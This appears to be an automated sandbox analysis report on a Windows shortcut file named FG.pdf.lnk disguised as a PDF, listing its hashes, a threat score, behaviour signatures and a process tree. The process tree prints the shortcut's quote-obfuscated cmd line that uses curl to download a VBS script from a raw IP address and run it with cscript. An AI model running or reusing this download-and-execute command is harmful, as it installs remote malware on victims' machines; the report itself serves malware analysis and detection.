Overview

overview

7

Static

static

1

FG.pdf.lnk

windows7-x64

3

FG.pdf.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    263s
  • max time network
    318s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 14:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FG.pdf.lnk

  • Size

    2KB

  • MD5

    7726e0d4ce453fc9542d1356e9c18e0e

  • SHA1

    13b8393a434d1f6dfe3224644dadd7be9bdf1a1e

  • SHA256

    9ad5bb0943d324d197caafe209dff379d5882caafe1628cf8779e5c58f8bb87b

  • SHA512

    4a001bf8cc31ebe8d8605d621bdecdcaf01ade51723a4698ba4ebfc1f92714b45116ed903e92f8624ec299bc92f8320d164853526e626a4ff0fffc4484f41858

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\FG.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c v49M || eCHo v49M & p"i"ng v49M || cu"R"l h"t"t"p":/"/"4"5."3"2"."222"."25"3/ym"t"p"R"/Yl -o C:\Users\Admin\AppData\Local\Temp\v49M.vbs & p"i"ng -n 3 v49M || c"scri"pT C:\Users\Admin\AppData\Local\Temp\v49M.vbs & e"x"It 'lHqqYhMrcXR
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\system32\PING.EXE
        p"i"ng v49M
        3⤵
        • Runs ping.exe
        PID:2720
      • C:\Windows\system32\PING.EXE
        p"i"ng -n 3 v49M
        3⤵
        • Runs ping.exe
        PID:2872
      • C:\Windows\system32\cscript.exe
        c"scri"pT C:\Users\Admin\AppData\Local\Temp\v49M.vbs
        3⤵
          PID:2876

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads